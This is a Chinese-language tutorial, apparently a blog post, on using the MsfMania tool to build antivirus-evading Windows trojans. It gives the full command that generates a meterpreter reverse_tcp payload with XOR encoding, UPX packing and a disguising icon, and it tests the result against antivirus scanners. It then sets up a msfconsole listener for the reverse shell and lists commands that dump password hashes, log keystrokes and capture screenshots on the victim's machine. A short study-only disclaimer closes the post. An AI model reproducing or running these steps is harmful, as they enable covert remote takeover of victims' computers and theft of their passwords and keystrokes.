MsfMania挫败病毒查杀软件
所谓免杀就是MUMA在目标操作系统运行的时候 杀毒软件无法对你的MUMA进行有效的检测、查杀(如有说错 还请各位大佬多多指正.....)
MsfMania工具的简介
这款工具主要是基于Python编写的命令行工具 主要用来绕过杀软的检测 运行环境:Kali+python3
官方贴出来的检测截图
MsfMania安装
这是工具官方给出的截图 不知道效果如何 我们来试一下水 看看效果如何
https://github.com/G1ft3dC0d3/MsfMania #该工具的官方文档
git clone https://github.com/G1ft3dC0d3/MsfMania.git #下载MsfMania到当前目录
cd MsfMania #进入MsfMania目录
MsfMania使用
python3 MsfMania.py -h #显示工具的用法
ico图标的制作 1.打开www.ico51.cn/ 选择文件,如1.png,选择ico尺寸后,点击生成即可,生成后的ico图标,放到MsfMania/icon目录下(如果不想在MUMA上显示图标 也可绕过此步)
python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -cO='-e x64/xor_dynamic' -lh 192.168.1.100 -lp 1616 -o XINGJIU -it local -i 19.ico --upx
生成出来的文件会保存在output目录下
以下是对这条指令参数的解释
-a 选择CPU的架构
-p 使用什么样的payload让主机与我们建立连接
-cO 使用什么样的编码方式来对MUMA进行加密
-lh 设置主机地址
-lp 设置主机端口
-o 生成的文件名称
-it 本地注入
-i 指定ICON图标
--upx 进行upx压缩处理文件大小
此时我们把MUMA丢到VirScanwww.virscan.org/上去检测
不知道实际运行会如何呢?我这里只测了某60 其它杀软没具体测过 不要想着能一直免杀下去 没准上一秒还能用 下一秒就废了
此时我们打开msfconsole进行监听
msfconsole #进入MSF渗透攻击框架
use exploit/multi/handler #使用监听模块
show options #显示监听模块需要设置的参数
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷要与刚刚生成的MUMA一致
set LHOST 192.168.1.100 #设置本地主机IP
set LPORT 1616 #设置本地主机端口
run #执行监听
监听后目标主机双击打开MUMA后即可与我们成功建立反向连接的会话 此时就可以执行后渗透相关的指令了
hashdump #抓取电脑密码
keyscan_start #开始键盘记录
keyscan_dump #获取键盘记录内容
sysinfo #查看系统信息
screenshot #对目标主机桌面进行截图
以上就是整个工具的使用方法了 这个工具能用多久也不清楚 没准上一秒能用 下一秒就废了 我个人也折腾了好几天才找到这款工具
免责声明
本工具仅限于学习和技术研究 不可用于任何非法用途